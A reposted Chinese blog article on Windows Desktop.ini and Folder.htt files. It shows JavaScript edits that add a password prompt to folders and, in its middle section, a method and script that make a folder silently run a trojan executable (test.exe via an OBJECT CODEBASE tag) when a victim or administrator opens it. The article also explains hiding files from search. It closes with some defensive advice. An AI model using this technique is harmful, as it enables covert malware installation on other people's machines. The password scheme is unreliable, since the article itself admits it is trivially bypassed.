浅析Desktop.ini文件的一些奇妙用途(转)

浅析Desktop.ini文件的一些奇妙用途(转)[@more@]

　　您还记得当初大名鼎鼎的“欢乐时光”病毒吗？感染该病毒的硬盘中会有多个Desktop.ini和Folder.htt文件，就算你删除了目录中的这两个文件，当你再次打开该目录时，它们又像幽灵一样出现了。

　　再问大家一个与此相关的问题：在Windows系统中，重复文件最多的什么呢？答案是Desktop.ini文件！在Windows目录及其下的Favorites、System、Fonts、Tasks文件夹中都有该文件的身影！正是由于该文件的存在，使得它们在外观或其他方面也与普通的文件夹有所区别。下面笔者就谈谈这两个文件的一些奇妙用途。

　　

　　 一、给文件夹加上密码

　　在学校的机房和校园网络的管理中，是否经常会碰到这样的情况：一些计算机常因学生误删了Windows目录或SYSTEM目录下的一些系统文件而导致无法正常启动。是否有方法可以把Windows及其它重要目录保护起来呢？方法是有的，我们只需在这个Folder.htt文件中进行必要的修改，就可改变文件夹打开的方式。比如，要想在打开该文件夹前先进行安全认证，可这样修改这个Folder.htt。

　　

　　在C盘的Windows文件夹中找到Folder.htt文件（该文件为隐藏文件，并且后来经过编辑与笔者共同验证，该文件不同的系统内容也不尽相同，本文种主要是Windows 98下的），打开Folder.htt文件。找到以下内容：

　　

　　＜a href=''class=command οnclick='ShowFiles()； ShowWinStat(winStat)； return false；' onMouseOver='ShowWinStat(!winStat)； return true；' onMouseOut='ShowWinStat(winStat)； return true；' onFocus='ShowWinStat(!winStat)； return true；' onBlur='ShowWinStat(winStat)； return true；'＞显示文件＜/a＞。"；

　　将其修改为：

　　＜a href=''class=command οnclick='ShowFiles()； ShowWinStat(winStat)； return false；' onMouseOver='ShowWinStat(!winStat)； return true；' onMouseOut='ShowWinStat(winStat)； return true；' onFocus='ShowWinStat(!winStat)； return true；'

　　

　　onBlur='ShowWinStat(winStat)； return true；'＞输入密码＜/a＞。"；

　　

　　（2）找到function ShowFiles() {

　　Info.innerHTML = L_Intro_Text + "＜br＞＜br＞" + L_Prompt_Text；

　　showFiles = true；

　　document.all.FileList.style.display = ""；

　　document.all.Brand.style.display = "none"；

　　FixSize()；

　　}

　　修改为： ★function ShowFiles()

　　

　　{var password=prompt("请输入密码:","")；

　　if (password=="你的密码"){Info.innerHTML = L_Intro_Text + "＜br＞＜br＞" + L_Prompt_Text；

　　showFiles = true；

　　document.all.FileList.style.display = ""；

　　document.all.Brand.style.display = "none"；

　　FixSize()；}

　　else{alert("警告，密码错误！您无权浏览该目录")；}}

　　

　　（3）保存修改后的Folder.htt文件，退出Windows文件夹。

　　

　　完成上述操作步骤后，再进入Windows目录时，系统提示输入密码，只有输入正确的密码才能进行该目录。通过修改打开行为的代码，就可实现对某个目录的简单加密。

　　

　　当然，这种加密目录很容易解开：不使用Web方式打开文件夹，避开执行该程序，或直接从DOS中进入该文件夹都可绕开密码的输入。

　　

　　如果你使用的是Windows 2000系统，可以找到

　　

　　………………

　　＜script language="JavaScript"＞

　　

　　然后在后面加上以下代码：

　　

　　var pass =prompt("enter the password")

　　if (pass!="密码")

　　{window.location="d:"}

　　

　　就可以给文件夹加上访问口令！这样你的文件夹就多了一层保护。

　　

　　 二、任意文件夹和硬盘分区的保护

　　根据同样的原理，我们可对任意文件夹及硬盘分区设置保护口今。具体操作步骤如下：

　　

　　（1）打开要加密的文件夹或硬盘分区，选择文件菜单中的“查看→自定义文件夹”。

　　

　　（2）在打开的“自定义文件夹”窗口中，如图1所示选择“创建或编辑HTML文档”，单击“下一步”按钮，再单击“下一步”按钮，关闭记事本编辑窗口，单击“完成”按钮。在当C盘Windows目录下找到Folder.htt文件，把它复制到当前文件夹中，覆盖原来的Folder.htt文件。

　　

　　（3）打开Folder.htt文件，找到★var L_Intro_Text= "＜b＞＜font color=red＞警告＜/font＞＜/b＞＜br＞＜br＞修改该文件夹的内容可能导致程序运行不正常。"；★（警告内容），将其修改为“自定义的内容”。完成Folder.htt的文件修改后，再进入相应的文件夹或硬盘分区，则需要提供正确口令，否则无法显示该文件夹的内容。

　　 　

　　 图1

　　

　　（一）、利用文件夹安装木马

　　

　　黑客可以利用文件夹来安装木马，其目的是对方只要打开某个文件夹就自动安装木马文件。知己知彼方能百战不殆，让我们了解一下其原理和方法。

　　 　

　　 图2

　　

　　1.先在以目录下建立一个文件夹test文件夹，进入刚建的文件夹test点击“工具”菜单选择“文件夹选项”项（图2）；出来文件夹选项对话框如图所示（图3），把“隐藏受保护的操作系统文件（推荐）”前面打上“√”，接着出现一个警告窗口，如图所示（图4），直接点击“是”。再把“隐藏文件和文件夹”下选择“显示所有文件和文件夹”，最后点击确定在本目录下出现了Folder settings隐藏文件夹和Desttop.ini隐藏文件如图所示（图5）。

　　 　

　　 图3

　　 　

　　 图4

　　 　

　　 图5

　　

　　2.现在点击“查看”菜单选择“自定义文件夹”项（图6），打开的“自定义文件夹”窗口，选择其中的“创建或编辑HTML文档”，单击“下一步”按钮，再单击“下一步”按钮，然后关闭记事本编辑窗口，单击“完成”按钮，就把文件夹设置成按WEB方式打开文件夹。再打开要放木马的文件夹,我们就在这个文件夹里测试。Folder.Htt是文件夹的模板文件，现在我们修改文件夹的模板文件，在里面插入一端自动运行程序的代码：

　　

　　＜script language="javascript"＞

　　run_exe="＜OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject""

　　run_exe+="CODEBASE="test.exe#version=1,1,1,1"＞"

　　run_exe+="＜PARAM NAME="_Version" value="65536"＞"

　　run_exe+="＜/OBJECT＞"

　　document.open()；

　　document.clear()；

　　document.writeln(run_exe)；

　　

　　document.close()；

　　＜/script＞

　　

　　 　

　　 图6

　　

　　就是这段里面的test.exe为你要安装的木马文件，这里为了给大家看到效果我运行的是LC4。

　　

　　3.现在我们把要运行的test.exe文件也copy到这个文件夹里，好了，我们现在把文件查看属性修改回去，就是步骤1的逆过程。

　　

　　4.OK，如果你不想要木马立即运行，请把窗口直接关闭，等管理员来运行吧。让我们来看看效果，退出test文件夹然后双击test文件夹图标，如图所示（图7），怎么样，运行了吧，大家可以把test.exe换成小点的木马，这样对方就在不知道的情况下给自己装了木马。其实大家如果要有什么文件要隐藏的话，就可以放到folder.htt和同目录下，把文件夹属性设置回去以后，用搜索都找不到这个文件。

　　

　　 图7

　　

　　 三、总结

　　好了，Folder.htt和Desktop.ini文件的好的应用和需要注意的都讲了，是不是觉得很有意思也很恐怖哦！现在我们说一下防范与解决办法：

　　

　　1.查看文件夹时，去掉以“Web页方式”的选项。虽然我们看不见什么个性化目录了，但我们换来是安全，我认为值！但是，也请大家注意，如果不采用“WEB方式”查看文件夹前面介绍过的技巧和应用就不能正常显示了，有得就有失啊。

　　

　　2.如果没有什么需要，去掉默认共享和共享目录。要是需要，公共用户也要加上密码，密码只有内部人知道。只要能上传文件，你的机器就很危险。除了上边的方法，还可以用MIME漏洞，ASP漏洞入侵，如果是Windows 98还有共享方法。所以一定要把好关！

　　

　　3.脚本病毒的一大特征就是利用WSH。要是服务器最好去掉WSH，这样能低御许多脚本病毒。方法是：在“控制面板”里选择“添加/删除程序”，选择“Windows安装程序”里的附件，再选择“详细资料”中的“Windows Scripting Host”把它卸载掉。

来自 “ ITPUB博客 ” ，链接：http://blog.itpub.net/8403220/viewspace-947988/，如需转载，请注明出处，否则将追究法律责任。

转载于:http://blog.itpub.net/8403220/viewspace-947988/